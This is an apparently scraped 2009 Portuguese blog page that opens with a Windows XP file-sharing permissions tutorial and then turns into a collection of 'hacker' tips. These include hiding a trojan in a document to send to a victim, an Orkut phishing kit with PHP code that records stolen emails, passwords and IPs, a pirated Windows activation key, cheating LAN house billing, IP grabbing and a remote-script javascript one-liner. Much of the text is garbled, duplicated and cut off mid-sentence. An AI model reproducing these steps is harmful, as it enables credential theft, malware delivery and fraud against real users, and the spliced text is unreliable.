sexta-feira, 6 de março de 2009

+ tecnicas di windows

+ tecnicas di windows
Primeiramente você pode efetuar este processo tanto em FAT como NTFS. Para melhor proveito teremos que exibir as opções escondidas da Guia Compartilhamento fazendo o seguinte processo, abra o Windows Explorer e clique em Menu
Ferramentas > Opções de Pastas > Guia Modos de Exibição, na lista de opções abaixo mostradas desmarque que penultima opção Usar Compartilhamento Simples de Arquivo(Recomendado) , agora a sua Guia Compartilhamento possui todas as opções para que possamos fazer este procedimento.

O intúito deste processo, é diferenciar os usuários uma vez que, alguns podem ter há necessidade de possuir permissões diferentes, o usuários X prescisa acessar o diretório G: e efetuar mudanças (Ler, Executar e Modificar) nas planilhas existentes já o usuário A somente pode Ler e Executar as planilha e não deve alterar o conteúdo destas, e sem este processo aseguir, não seria possível efetuar esta diferenciação pois, por padrão, ao criar um compartilhamento no Windows XP a permissão de Controle Total é atribuída há um único usuário existente na lista, este denominado Todos, esta permissão atribuída a este usuário permite que, qualquer usuário possa acessar o compartilhamento. Os passos deste How To também pode ser utilizado na resolução de problemas com relação a problemas de Acesso Negado que, em algumas ocasiões em que possuimos uma pequena Rede podem ocorrer causando assim incovenientes frustações relacionadas com seu trabalho ou até mesmo em todos os usuários.

O primeiro passo a ser efetuado é a criação dos mesmos usuários da rede na estação rodando o Windows XP onde se encontra o( s) disco( s) e/ou diretório( s) que será compartilhado, caso seja necessário compartilhar diretórios em outras estações o mesmo processo será necessário nestas.

Para efetuar este processo, os passos seriam estes aseguir:

Interpretando um pequeno exemplo...

Suponhamos que utilize a conta padrão Administrador para efetuar as tarefas do dia a dia em sua estação (não é recomendado por SEGURANÇA) e não é recomendado por SEGURANÇA) e o usuário Carlos Eduardo utiliza seu próprio nome anteriormente citado como nome de usuário para efetuar logon em sua estação e assim efetuar suas tarefas, para restringir o acesso a ele você tera que criar um usuário em sua estação com os mesmos atributos do usuário Carlos Eduardo em sua estação, senha se houver, grupo qual o usuário pertence seja Administrador ou Convidado ou quantos grupos pertença esse usuário.


Para criar um ou mais usuários no Windows XP, efetue logon como Administrador ou um conta com este privilégio, abra o Console Gerenciamento do Computador ( clique em Iniciar > Executar digite compmgmt.msc e tecle ENTER ou Painel de Controle > Sistema > Ferramentas Administrativas > Gerenciamento do Computador ).
Após aberto o Console a interface abaixo será exibida:
O próximo passo é clicar na arvore ao lado direito em Usuários e Grupos Locais > Usuários, neste momento estarão sendo exibidas as contas existentes em sua estação como mostrado na imagem aseguir:

Agora clique com o botão direito do mouse sobre uma parte em branco ao lado direito como mostrado aseguir e escolha Novo Usuário...:
Uma nova janela será aberta neste instante para que este novo usuário seja criado como mostrado abaixo: Preencha os campos mostrados acima com as mesmas informações de cada usuário que irá criar com as mesmas caracteristicas do usuário da estação que ira acessar o servidor Windows XP.

Campo Nome de Usuário é obrigatório neste processo, preenche com o respectivo nome do usuário da rede.
Campo Nome Completo é opcional, e isto fica a seu critério ou do usuário colocar, suponhamos que o usuário tenha um nome de usuário WinUser e nada seja colocado no campo Nome Completo, então o nome WinUser será exibido na tela de logon tradicional do Windows XP, já, se houver um Nome Completo, este será eixbido na tela de logon do Windows XP.
Campo Descrição é opcional e pode ser usado para fornecer previamente quem é o usuário, qual sua função, etc.
Opção O usuário deve alterar a senha no próximo logon é opcional e deve ser utilizada caso o usuário não possa forneçer a senha no momento de sua criação, sendo possível troca-la no momento em que este efetuar um novo logon na estação.

Nota: Se a opção anteriormente citada estiver marcada as duas opções seguidas estarão desabilitadas e inacessíeis como mostrado na figura anteriormente, para ter acesso a elas a primeira opção deve ser desmarcada.

Opção O usuário não pode alterar a senha impede que o usuário altere esta posteriormente altere esta por meio do Console, somente administradores poderam efetuar este processo.
Opção A senha nunca expira impede que a senha tenha um tempo de vida estipulada que é uma opção de segurança em rede.
Opção Conta Desativada remove a conta da tela de logon e tambem impede que o usuário possa utilizar esta na estação.

Será necessário que a senha do usuário seja digitada por ele neste momento, caso isto seja possível, desmarque a opção
O usuário deve alterar a senha no proxímo logon, caso o usuário não esteja presente permaneça com a opção anteriormente citada marcada e não atribua nenhuma senha no campo, deixe-a em branco, quando o usuário estiver presente, efetue logoff e efetue o logon como o us caso o usuário não esteja presente permaneça com a opção anteriormente citada marcada e não atribua nenhuma senha no campo, deixe-a em branco, quando o usuário estiver presente, efetue logoff e efetue o logon como o usuário deste, e pessa para que ele atribua a mesma senha que utiliza em sua estação e o processo esta terminado e os novos usuários já podem ser visualizados na parte direita do Console como mostrado aseguir:

Nota : A senha deve ser um requisito prioritário uma vez que, esta em rede deve garantir que somente o usuário correto possa efetuar seus trabalhos em sua estação .

Efetue o mesmo processo anteriormente mostrado para criar outros usuários.
Após ter criado todos os usuários necessários, é necessário inseri-los em seus grupos de trabalho equivalentes, no Console clique em Usuários e Grupos Locais > Grupos como mostrado aseguir:
Por padrão neste processo, os usuários criados são atribuídos ao Grupo Usuários, caso estes usuários não sejam pertencentes a este grupo remova eles deste, de um duplo clique sobre o grupo Usuários e selecione os usuários, clique no botão Remover e após ter removido todos clique em Aplicar, OK.

Acima você pode verificar os grupos padrões do Windows XP, Administrador , Usuários avançados , etc, para inserir um ou mais usuarios em um grupo, dê um duplo clique sobre o grupo para que a caixa de de Propriedades do Grupo seja aberta como mostrado abaixo:
Com a janela sendo exibida clique em Adicionar... , uma nova janela será exibida como mostrada abaixo: Para facilitar o processo de inserção dos usuários, utilize ; ponto e virgula para separa-los como mostrado na figura anteriormente para que não seja presciso inseri-los um á um, clique em Verificar nomes para que estes sejam autenicados como válidos e depois clique em OK.

Novamente você estará na janela principal do Grupo e já estará visível os novos usuários pertencentes a este grupo, clique em Aplicar, OK para encerrar este processo.

Bem, feche o Console de Gerenciamento do Computador.



Agora com os usuários previamente criados, vamos Compartilhar definitivamente um diretório.

Clique com o botão direito do mouse sobre o Compartilhamento qual tem intensão de restrigir o acesso de usuários em expecifico , e escolha entre as opções Compartilhamento e Segurança para que a janela aseguir seja exibida 5 fev excluir FODÃO
Agora habilite o Compartilhamento e crie um nome para ele caso este não possua um como mostrado na figura aseguir:
Caso queira um Compartilhamente Oculto ou seja, este não estará presente aos compartilhamento normais quando lista-los em uma estação da rede, somente sendo possível acessa-lo usando o caminho UNC \\BTOCOMUNIC\ArqServer, coloque o sinal de cifrão $ no final do nome do Compartilhamento.


Certifique-se de tambem de como quer tratar as conexões simultaneas permitidas a esse compartilhamento, caso queira colocar um número expecifico de conexões, utilize a opção Permitir este número de usuários em Limite de Usuários e na caixa a frente coloque o número limite como mostrado aseguir:
Vale lembrar que no Windows XP, são possíveis somente 10 conexões simultâneas , ou seja, se habilitar um limite de 10 conexões como mostrado na figira anterior, estará automáticamente usando a opção Máximo permitido que é equivalente a 10 conexões, ou seja, somente use esta opção caso o limite seja menor que 10 conexôes simultâneas. Caso seja necessários uma margem de conexões simultâneas acima de 10 é recomendado utilizar um sistema operacional que suporte, neste caso por exemplo Wind Na proxima caixa exibida sera exibida somente com um usuário Todos como é padrão do Windows XP com a permissão de Leitura como mostrado abaixo.
Mais adiante mostrarei quais as ações são atribuídas por cada permissão.

Selecione-o dando um clique sobre ele e clique em Remover , agora clique no botão Adicionar... , nesse momento suponhamos que possua 5 usuários em sua rede, para que você adicione todos de uma só vez digite os nomes do usuários separados por ; (ponto e virgula) ja mencionado anteriormente criando usuários e como no exemplo abaixo e clique em OK:
Após ter inserido os usuários, certifique-se dê que todos estão sendo exibidos na lista de usuários na Guia Compartilhamento como mostrado aseguir:
Tendo se certificado de que tudo esta OK, agora iremos tratar das permissões relativas a cada usuário.

Diferente de Permissões Locais (NTFS) que podem ser modificadas separadamente o que permite uma melhor administração da segurança, as Permissões de Compartilhamento englobão as permissões em uma única, ou seja, dentro de uma permissão são inseridas outras mais, a diferença pode ser percebida pela quantia que é menor no bloco de permissões de Compartilhamento como mostrado abaixo comparado com as permissões exibidas no bloco permissões locais (NTFS). irá atuar uma vez Permitida ou Negada.

No bloco de permissões, existem duas colunas uma coluna contendo Permitir e outra coluna contendo Negar, para termos certeza de que uma permissão seja realmente aplicada, evite apenas desmarcar a caixa de seleção na coluna Permitir, sempre marque a seleção na coluna Negar quando for necessário.

Agora com relação a entender as permissões, para isso, seram descritas as ações que seram permitidas ou negadas ao marcar a caixa de seleção na coluna desejada e tambem quais permissões fazem parte da principal mostrada no bloco de permissões de Compartilhamento.

Diferenças entre as permissões:

Leitura permite ou nega aos usuários...

Listem os nomes de arquivos e de subpastas, dentro da pasta compartilhada.
Acessar as subpastas da pastas compartilhada.
Abrir os arquivos para leitura.
Execução de arquivos de programas (.exe, .com, etc)

Alteração permite ou nega aos usuários...

Criação de arquivos e subpastas.
Alteração de dados nos Arquivos.
Exclusão de subpastas e arquivos.

Controle Total (padrão quando se é criado um novo compartilhamento atribuida ao usuário Todos) permite ou nega aos usuários...

Todas as opções anteriores mensionadas.
Alteração de permissões.
Apropriação ou Take Ownership.

Uma prática recomendada é efetuar testes antes de por em funcionamente uma pequena rede, utilizando permissões de Compartilhamento para evitar possíveis problemas que possam afetar o ótimo desempenho de suas tarefas e que resultem na seguinte caixa de dialogo... Após ter efetuado teste de campo, e constatado que não há nenhum problema, sua rede esta pronta e internamente com segurança com relação a integradade e confidencialidade das informações nela contidas e já poderá visualizar o ícone de seu compartilhamento no diretório onde este se encontra como mostrado abaixo sendo segurado por uma mão na parte inferior.

Um ponto para ser mensionado aqui também, é que NEGAR uma permissão sobrepõe uma permissão PERMITIR, se você der permissão de Leitura a um usuário em uma determinada pasta neste compartilhamento e em outra atribuir a permissão de Negar Leitura a permissão do usuário sera de NEGAR Leitura em todas as pastas e arquivos.

--------------------------------------------------------------------------------

Outro ponto importante tambem é que ao atribuir permissões de compartilhamento você deve tomar cuidado com diferentes permissões entre pastas e subpasta mantenha pastas expecificas para os grupos em diferentes diretórios evitando de possuir pastas que este não deva acessar dentro de um diretório que este tenha que ter acesso.

Por exemplo...

Se você atribuir a permissão de Leitura e Alteração ao diretório compartilhado W:\Consulta de Preços para um usuário X , e dentro deste mesmo diretório, existir um outro subdiretório qual esta não deve acessar suponhamos
W:\Consulta de Preços\Promoções do Dia e a esta foir atribuida uma permissão NEGADA automaticamente este usuário tera permissão negada no diretório qual tem que efetuar mudanças como Alterar e Leitura. Permissões de Compartilhamento tambem são Acumulativas, ou seja, se você possuir um usuário que pertence a mais de um grupo, e este grupos necessitam acessar um mesmo compartilhamento, este usuário possuirá a soma das permissões, se o usuário X tem permissões de Leitura no Grupo Almox e tem permissão de Controle Total no Grupo Gerentes Almox no compartilhamento W:\Consulta de Preços, sua permissão efetiva será Controle Total .

A solução para este tipo de problema é adicionar o usuário individualmente nas permissões de compartilhamento e atribuir as permissões equivalente sendo assim mantida a integridade novamente.

Apos ter feito todas estes procedimentos reinicie sua estação e tente acessar o compartilhamento para qual anteriormente atribuiu novas permissões de compartilhamento e verifique se teve êxito nas novas configurações.

--------------------------------------------------------------------------------

O Firewall do Windows XP pode também causar problemas relacionados ao compartilhamento se a opção Compartilhamento de Arquivos e Impressoras não estiver marcada na Guia Exceções (somente Service Pack 2).

--------------------------------------------------------------------------------

Outra dica que pode ajudar a solucionar problemas de acesso em estações utilizando o Windows XP Professional, e configurar corretamente os direitos de usuários no Console de Diretivas de Segurança Local (secpol.msc).

Para efetuar o processo, é necessário que seja feito logon como Administrador da estação, após isso, clique em Iniciar > Executar digite secpol.msc e tecle ENTER.

Com o Console iniciado, localize então o seguite diretório de direitos de usuários:

Configuração de Segurança > Diretivas Locais > Atribuição de Direitos de Usuários

Ao lado direito deve se localizar as seguintes diretivas:

Acesso a esse Computador pela Rede
Negar Acesso a esse Computador pela Rede

O primeiro passo é configurar a primeira diretiva que dará acesso pela red O primeiro passo é configurar a primeira diretiva que dará acesso pela rede. Certifique-se que o usuário Todos está sendo exibido junto aos usuários com acesso, o usuário Todos pode ser removido por motivos de SEGURANÇA em sua rede, após remove-lo caso tenha problemas com o acesso, insira os usuários criados anteriormente ou apenas os que devem ter acesso aos compartilhamento existentes na estação, feche o Console e reinicie o Windows XP.

A segunda diretiva que se refere ao acesso NEGADO pela rede, pode ser tratada das seguintes formas:

Ou pode se excluir apenas os usuários que sendo negado o acesso ou também pode ser excluídos todos os usuários caso o Administrador não identifique qual é o que esta causando o problema. Remova o( s) usuário( s) que forem necessários, feche o Console e reinicie o Windows XP.

--------------------------------------------------------------------------------

Há um problema em efetuar este procedimento descrito neste tutorial, relacionado com segurança local, uma vez que criou os mesmos usuários das estações pertencentes a rede em uma estação designada como servidor, qualquer um destes poderá efetuar logon sem nenhum problema, e acessar os arquivos locais de qualquer usuário uma vez que as Permissões de Compartilhamento somente tem efeito em rede e não localmente, para evitar possíveis problemas com isso, é necessário que Permissões Locais (NTFS) sejam atribuídas á estes usuários posteriormente as Permissões de Compartilhamento.
--------------------------------------------------------------------------------

Uma recurso também que não foi descrito anteriormente e o Mapeamento de Drives de Rede que torna o acesso aos compartilhamento por intermédio das outras estações mais rápido e de fácil localização uma vez que os mesmo se encontraram juntamente em Meu Computador com sua letras equivalentes. Para executar este mapeamento, abra Meu Computador e clique no menu Ferramentas » Mapear Unidade de Rede..., na janela exibida escolha qual letra será at FIXOEscondendo um trojan em um arquivo de texto]
[FIXOEscondendo um trojan em um arquivo de texto]
Escondendo um trojan em um arquivo de texto
Descobri uma ferramenta aqui no próprio windows depois de le um certo texto, que eu poderia
utilzar esta ferramenta para inserir um trojan em arquivo de texto, e assim, poder mandar pra uma
pessoa via msn sem problemas..ou seja não precisa zipar... e então achei interessante postar aqui.... trata-se do packager, bom
se alguém já conhecia peço desculpa, pq eu não conhecia o seu funcionamento.

CLIQUE NO INICIAR, EXECUTAR E DIGITE "PACKAGER" SEM ASPAS...

Abra uma figura com qualquer editor de imagem, selecione a figura e dps cole no PACKAGER, depois selecione menu arquivo e importar, e escolha o server que for.

Vai no menu editar e escolha copiar pacote, dps abra o wordpad que é o melhor se a vítima possuir só ele, porque se a vitima abrir pelo word ele vai exibir aviso de risco de vírus>>> com o wordpad aberto ou word mande colar especial...
E escolha pacote... Já de pra notar que estamos criando um pacote para wordpad ou word...

aí é so salvar o arquivo como doc, e mandar pra pessoa... Vc use a sua criatividade para colocar uma legenda pedindo pra pessoa da 2 clques na figura. Ou então, faça como eu, eu cliquei com botão direito da figura e fui em propriedade do objeto e escolhi um ícone de instalação do pacote e botei uma legenda. Fica um ícone com a seguinte legenda "Para visualizar a imagem instale o pacote"... Se a pessoa tiver no word e der 2 cliques, vai vir a mensagem dizendo que pode ser um vírus, caso ela clique em instalar o pacote o ícone sumirá e no lugar do ícone vai aparecer a imagem. Caso ela não tenha o word instalado, ela irá conseguir abrir no wordpad, o wordpad não avisa nada ele instala direto...

तेक्निकास WINDOWS

DEIXAR WINDOWS ORIGINAL
Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndowsNT\Cu rrentVersion\WPAEvents

4. No painel à direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite:

%systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção “Sim, desejo telefonar…”

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key:

THMPV-77D6F-94376-8HGKG-VRDRQ

e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela

anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite:

%systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows

O Windows já está ativado. MUDE O NOME DA LIXEIRA
1º vá no bloco de notas e escreva isso:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}]
@="Lixão"

E aperta Ctrl + S e salve como lixeira.reg

apos isso feche o bloco de notas e executa o arquivo o mudara o nome para lixão

ou se vc quiser arrumar outro nome por exeplo coco la no lugar do codigo aondi ta escrito "Lixão" só tiura o lixão e arruma o nome que tu qué deixa o aspas.

depois vc vai no seu desktop e aperta F5.... aprenda a camuflar pasta no dekstop
Essa dica é muito facil é muito simples e muito util se vc quiser esconder alguma coisa de seus pais por exemplo ou algo q vc naum queira q ninguem veja.

1º Crie uma pasta no Desktop e aperte alt 255
2º Vá em propriedades da pasta , personalizar e Alterar Icone agora escolha o Icone Invisivel pronto.

Agora vc tem uma pasta camuflada em seu Desktop ou em qualquer outra pasta. Aprenda a camuflar uma pasta no desktop

essa dica é muito facil é muito simples e muito util se vc quiser esconder alguma coisa de seus pais por exemplo ou algo q vc naum queira q ninguem veja

1º crie uma pasta no desktop e aperte alt 255
2º va em propedades da pasta , personalizar e alterar icone agora escolha o icone invisivel prontu

agora vc tem uma pasta camuflada em seu desktop Criando Cavalo de TROIA
criando cavalo de troia

eu ja criei um cavalo de troia no bloco de notas eh muito facil copie o seguinte codigo para o bloco de notas

VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.Form Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height

mas tem que salvar em arquivos em lotes do cmd
salve por exemplo:example.bat ou example.cmd
pode ser qualquer nome desde que termine com .bat ou .cmd

so nao teste em seu computador primeiro vc vai precisa.
conta no 110mb.com
so issu
intaum vamo la.
SpHacker.bat
-=PARTE 1=-
esse link eh para uma pagina fake do login ja pronto vc nao vai ter trabalho nem um so

baixar

http://www.4shared.com/file/42150799/ecc2d41b/login.html


_____________
mais c vc eh dakeles q ker faze tudo

vamo la

kem baixo a pagina fake no link acima nao precisa faze essa parte

vai na pagina de login do orkut, mais eh na pagina de login nao eh na pagina inicial nem

na pagina de comunidade nem muito menos na pagina de recados, vai na pagina de login msm.

click em exibir na barra de ferramentas do seu browser"navegador", depois click em
codigo-fonte.(se vc usa firefox eh so clica ctrl+u q ja abre)

no bloco de notas q se abre click em arquivo depois em salvar como e salva no seu desktop ou

em uma pasta q vc axe facil de encontrar.

No código (no bloco de notas) dê CTRL F, vai aparecer uma janela e digite lá pra

"Localizar", src, click em "Localizar próxima" e vai clicando até vc localizar um endereço

que vai tá exatamente assim:


veja bem este endereço está incompleto quando a página está hospedada num site fora do orkut

a imagem não é encontrada e por isso vc deve acrescentar o ENDEREÇO COMPLETO, coloque assim:


o que está em vermelho vai ter que digitar.

NOTA: Observe bem que é https e não http.

Ainda com a página aberta no bloco de notas, CTRL F de novo pra localizar agora a palavra

action, vai lá...

Encontrou? Só tem uma palavra em todo o código, vc vai encontrar um endereço ssim (entre

aspas):
https://www.google.com/accounts/ServiceLoginAuth?service=orkut
vai substituir todo ele por salva.php
Com a palavra action o código inteiro vai ficar assim:
action="salva.php"
Salve a página, como login.htm e ela está pronta agora."pode fecha-la"
kem baixo a pagina fake no link acima precisa faze essas partes agora!!!!▼ -=PARTE 2=-
agora vamo cria os arquivos em php pra pega a senha


abre um novo bloco de notas e nele vc coloca o seguinte codigo

$nomearquivo ="senhas.txt";
$email =$_POST["Email"];
$senha =$_POST["Passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="
___________________________created_by_kArOt________________________
";
$ess ="Email: ".$email."
Senha: ".$senha."
Navegador: ".$browser."
IP: ".$ip."
Nome do Host: ".$hostname."
Data: ".$data."
Hora: ".$hora."
".$traco;
$abre =@fopen("senhas.txt","a+");
$escreve =fwrite($abre, $ess);
echo "";
?>


e salva na msm pasta q ta o login ou se vc poz no desktop poe no desktop msm como salva.php


Obs. se o seu computador nao mostra a extensao dos arquivos pra v issu abre qualquer

pasta no seu pc

clica em ferramentas

opções de pasta click na aba modo de exibcao
-=PARTE 7=-
agora eh so vc clica em


http://seu_nome.110mb.com/login.htm - para abrir a pagina de login falsa do orkut

entre em

http://seu_nome.110mb.com/ler.php - para ler os login e senha pegos

entre em

http://seu_nome.110mb.com/apagar.php - para apagar os login e senhas pegos


fim


agora se nao deu certo baixo os arquivo tudo nesse link

e eh so poe eles no 110mb.com

http://www.4shared.com/file/42151177/29c8cf45/haker_orkut_by_karot.html



ai em baixo tem la

"ocultar as extensoes dos arquivos conhecido" eh so desmarcar essa opcao PARTE 4=-
abre um novo bloco de notas e nele vc coloca o seguinte codigo


$fd = @fopen("senhas.txt","w") or die("arquivo inexistente");
fpassthru($fd);
?>


e salve como apagar.php.


eh com esse arquivo q vc vai apagar as senhas.


-=PARTE 5=-
agora com esses arquivos ja na pasta o no seu desktop.

-> Login.htm: a página fake já com as modificações necessárias.
-> salva.php: arquivo php necessário pra página funcionar.
-> ler.php: com esse arquivo é que vc vai conseguir ver as senhas e logins.
-> apagar.php: com esse arquivo vc vai apagar as senhas e logins depois de ter guardado.


vamos ospedar eles no 110mb.com

Entre:
http://www.110mb.com/register.php

Preencha normalmente os campos requeridos...

• com nome do site...
• um Password / senha de acesso...
• coloque um email para confirmação do cadastro...


Quando estiver nesta Parte:

* Terms of Service - Signature
Read our entire TOS, and you'll find a signature to enter into this field.


Coloque esta mensagem:
I will never engage in phishing or abusive actions on 110mb

• na parte Amarela marque o Quadradinho...

• digite o Captcha"akelas letrinhas xatas q ele poe la" normalmente e clique

em:

Creat My Account Now!

सिंह ADM

hackear senha do adm
http://www.explorando.viamep.com/2007/02/dica-como-hackear-senha-do.html
desbloquear foto cm cadeado
http://br.youtube.com/watch?v=EaYzwcj042A&feature=related
[Tut] Alterar senhas de usuários rapidamente
Truque rápido para modificar a senha de um usuário na máquina (é preciso estar logado com direitos de administrador):

1. Entre no Prompt de Comando
2. Digite o comando net user
3. O comando lista todos os usuários locais
4. Para alterar a senha de um usuário digite net user fulanodetal novasenha

Para mudar a senha sem que ninguém veja o que está sendo escrito:

1. digite net user fulanodetal *.
2. Vai aparecer a mensagem: "Digite uma senha para o usuário:".
3. Você digita a nova senha e ela não aparece na tela! Tenha fé e acredite que você realmente está mudando a senha. Sem um feedback, recomendo que você preste bem atenção no que digita.
4. Aperte enter e outra mensagem surge: "Redigite sua senha para confirmação:".
5. Digite a senha novamente, sem errar, e pronto.

Repare que, em nenhum dos métodos, se pergunta sobre a senha anterior, o que pode ser a saída se você a tinha esquecido!

TECNICS HACKER

Roubar tempo em Lan HouseRoubar tempo na LAN-HOUSEProcess ExplorerSimples:- Baixe o Process Explorer do site www.snapfiles.com/get/processexplorer.html e inicie na máquina da lan house (não precisa instalar)।- Após o Process Explorer começar, procure pelo processo do software que acaba com sua diverção, normalmente está tarjado com uma cor roxa.- Se houver mais de um processo em roxo, selecione o primeiro da three (árvore).- Após selecionado clique com o botão direito e selecione KILL PROCESS ou PAUSE PROCESS.=================Ação e reação=================- Alguns softwares de lans possuem um sistema se segurança que quando o processo for finalizado, ele trancará o computador.- Use a lanhouse em dias movimentados, pois o administrador (se não for burro) pode notar que tem um computador sendo usado mas no cliente do software mostra ele como livre...- Use PAUSE PROCESS para garantir que não vai haver os erros acima mensionado. [ IpGet 1.50 http://www.4shared.com/file/39096728/5b3401dd/IPGet150.html] Tutorial[ Tutoria ] Pegar IP pelo MSN usando o IpGet.Primeiro- Download.:Baixe os Softwares abaixo seguido dos links.Download's:[ IpGet 1.50 http://www.4shared.com/file/39096728/5b3401dd/IPGet150.html][ MSN Plus Live http://baixaki.ig.com.br/site/dwnld41034.htm ][ Windows MSN Live http://baixaki.ig.com.br/site/dwnld39032.htm ] Segundo- Instalando.Instale os programas baixados nessa ordem:1º O MSN Live (Caso você não tenha);2º O MSN Plus;3º O IpGet (Para instalar o IpGet você tem que estar no MSN).O IpGet é um script, no meio da Instalação do IpGet vai pedir para instalar o winpcap, depois de Instalar o winpcap vai continuar a instalação do IpGet. Segundo- Instalando.Instale os programas baixados nessa ordem:1º O MSN Live (Caso você não tenha);2º O MSN Plus;3º O IpGet (Para instalar o IpGet você tem que estar no MSN).O IpGet é um script, no meio da Instalação do IpGet vai pedir para instalar o winpcap, depois de Instalar o winpcap vai continuar a instalação do IpGet. video aulas orkut
http://www.youtube.com/watch?v=_OAHIbjFvFY&feature=related tecnica hackerFazer a pessoa deslogar do OrkutAntes de tudo você deve ter a pessoa adicionada...Assim você deve mandar um scrap pra ela assim:< embed src="< a href=" cmd="logout" target="_blank">< /embed>http://www.orkut.com/Glogin.aspx?cmd=logout< /a>">Com isso... toda vez que alguém for acessar o scrapbook dessa pessoa cairá do orkut. ●๋•.visite perfis em massa de forma rapidajavascript:d=document.createElement('SCRIPT');d.src='http://br.geocities.com/thiagorafael.trp14/MassVisitation.txt';document.getElementsByTagName('head').item(0).appendChild(d);void(0)massvisitationcopia todo o codigo e cole no seu navegador e da entercom o massvisitation vc visita pessoas em massa de forma rapidae simplesideal para quem quer divulgar algo com algum perfilquando vc visita uma pessoa automaticamente ela ira te visitar Tentando Resolver o problema de não pegar IP.Bom, se por depois de você ter configurado tudo certinho, e não ainda não tive pegando o Ip da vitima, mande algum arquivo para ela, para ver se resolve, se não resolver verifique se ele esta ativado.Clique no icone marcado com o numero 1 como mostra a imagem abaixo e depois va em configuração dos scripts (numero 2).[ Imagem http://img240.imageshack.us/img240/2048/77018316cs1.jpg ]E na nova janela que foi aberta, verifique se a caixa do IpGet esta selecionada, se não tiver, selecione, ai aperte em aplicar e OK.[ Imagem http://img219.imageshack.us/img219/930/68848290um3.jpg ]as vezes ele desativa sosinho !

existem varios meios conseguir senhas de acessos

existem varios meios conseguir senhas de acessos
#Existem varios meios de se obter senhas#Existem vários meios de se obter senhas de acessos. Os mais comuns estão listados abaixo. ****************************************************************Cavalo de TróiaO hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programa, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.Farejamento de redesPara acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.Engenharia socialÉ uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker. Quebra-cabeçaUm jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.Invasão do servidorO hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.DeduçãoUm hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:1. Cerca de 1 em cada 30 usuários usa o login como senha.2. Muitos administradores usam a senha padrão do sistema.3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

fazer cartão de creditos

fazer cartão de creditos
